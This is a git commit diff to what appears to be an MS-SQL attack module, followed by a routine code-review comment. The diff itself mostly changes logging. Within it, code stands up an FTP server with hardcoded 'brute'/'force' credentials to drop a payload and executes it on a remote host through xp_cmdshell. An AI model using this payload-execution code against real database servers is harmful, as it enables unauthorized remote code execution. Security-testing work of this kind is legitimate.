* Finalized the MS-SQL code

* Changed the log calls to the right logger and added exception info.

* better docs and some pep 8
This commit is contained in:
maor.rayzin 2018-06-27 21:30:54 +03:00
parent 149525d205
commit b46810e02b
3 changed files with 16 additions and 10 deletions


@ -1,5 +1,6 @@
from os import path from os import path
import logging import logging
import pymssql import pymssql
import mssqlexec_utils import mssqlexec_utils


@ -1,4 +1,3 @@
import os import os
import multiprocessing import multiprocessing
import logging import logging
@ -11,12 +10,17 @@ from pyftpdlib.handlers import FTPHandler
from pyftpdlib.servers import FTPServer from pyftpdlib.servers import FTPServer
__author__ = 'Maor Rayzin'
FTP_SERVER_PORT = 1026 FTP_SERVER_PORT = 1026
FTP_SERVER_ADDRESS = '' FTP_SERVER_ADDRESS = ''
FTP_SERVER_USER = 'brute' FTP_SERVER_USER = 'brute'
FTP_SERVER_PASSWORD = 'force' FTP_SERVER_PASSWORD = 'force'
FTP_WORKING_DIR = '.' FTP_WORKING_DIR = '.'
LOG = logging.getLogger(__name__)
class FTP: class FTP:
@ -131,12 +135,12 @@ class CmdShellAttack(AttackHost):
for cmd in shellcmds: for cmd in shellcmds:
self.cursor.execute(cmd) self.cursor.execute(cmd)
except Exception, e: except Exception, e:
logging.error('Error sending the payload using xp_cmdshell to host: {0}'.format(e.message)) LOG.error('Error sending the payload using xp_cmdshell to host', exc_info=True)
self.ftp_server_p.terminate() self.ftp_server_p.terminate()
return False return False
return True return True
else: else:
logging.error("Couldn't establish an FTP server for the dropout") LOG.error("Couldn't establish an FTP server for the dropout")
return False return False
def execute_payload(self): def execute_payload(self):
@ -151,27 +155,27 @@ class CmdShellAttack(AttackHost):
# Getting the payload's file name # Getting the payload's file name
payload_file_name = os.path.split(self.payload_path)[1] payload_file_name = os.path.split(self.payload_path)[1]
# Preparing the cmd to run on remote, using no_output so i can capture exit code: 0 -> success, 1 -> error. # Preparing the cmd to run on remote, using no_output so I can capture exit code: 0 -> success, 1 -> error.
shellcmd = """DECLARE @i INT \ shellcmd = """DECLARE @i INT \
EXEC @i=xp_cmdshell "chdir C:\\& C:\\tmp\\{0}", no_output \ EXEC @i=xp_cmdshell "chdir C:\\& C:\\tmp\\{0}", no_output \
SELECT @i """.format(payload_file_name) SELECT @i """.format(payload_file_name)
try: try:
# Executing payload on remote host # Executing payload on remote host
logging.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name)) LOG.debug('Starting execution process of payload: {0} on remote host'.format(payload_file_name))
self.cursor.execute(shellcmd) self.cursor.execute(shellcmd)
if self.cursor.fetchall()[0][0] == 0: if self.cursor.fetchall()[0][0] == 0:
# Success # Success
self.ftp_server_p.terminate() self.ftp_server_p.terminate()
logging.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name)) LOG.debug('Payload: {0} execution on remote host was a success'.format(payload_file_name))
return True return True
else: else:
logging.warning('Payload: {0} execution on remote host failed'.format(payload_file_name)) LOG.warning('Payload: {0} execution on remote host failed'.format(payload_file_name))
self.ftp_server_p.terminate() self.ftp_server_p.terminate()
return False return False
except pymssql.OperationalError: except pymssql.OperationalError:
logging.error('Executing payload: {0} failed'.format(payload_file_name)) LOG.error('Executing payload: {0} failed'.format(payload_file_name), exc_info=True)
self.ftp_server_p.terminate() self.ftp_server_p.terminate()
return False return False
@ -189,10 +193,10 @@ class CmdShellAttack(AttackHost):
multiprocessing.log_to_stderr(logging.DEBUG) multiprocessing.log_to_stderr(logging.DEBUG)
p = multiprocessing.Process(target=ftp_s.run_server) p = multiprocessing.Process(target=ftp_s.run_server)
p.start() p.start()
logging.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name)) LOG.debug('Successfully established an FTP server in another process: {0}, {1}'.format(ftp_s, p.name))
return ftp_s, p return ftp_s, p
except Exception, e: except Exception, e:
logging.error('Exception raised while trying to pull up the ftp server: {0}'.format(e.message)) LOG.error('Exception raised while trying to pull up the ftp server', exc_info=True)
return None, None return None, None
def __find_own_ip(self): def __find_own_ip(self):
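Review bot: In the `execute_payload` hunk the only handler is `except pymssql.OperationalError`, so if `self.cursor.fetchall()` returns no rows the `[0][0]` index raises IndexError, the exception escapes the method and `self.ftp_server_p.terminate()` is never reached, leaving the helper FTP process running. The three `terminate()` calls spread over the success, failure and except branches should collapse into a single `finally: self.ftp_server_p.terminate()` on that `try`, which also covers any other unexpected exception from the cursor; the method's body starts above the hunk, so the `try` may need widening accordingly. Separately, the `except Exception, e:` clauses at the two `LOG.error(..., exc_info=True)` sites no longer reference `e` now that the message text is fixed, so they can become `except Exception:`. The message concatenates `payload_file_name` with `.format()` while `exc_info=True` already carries the traceback, so no further detail needs to be added to the string.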


@ -0,0 +1 @@
dir c:\>c:\tmp\dir.txt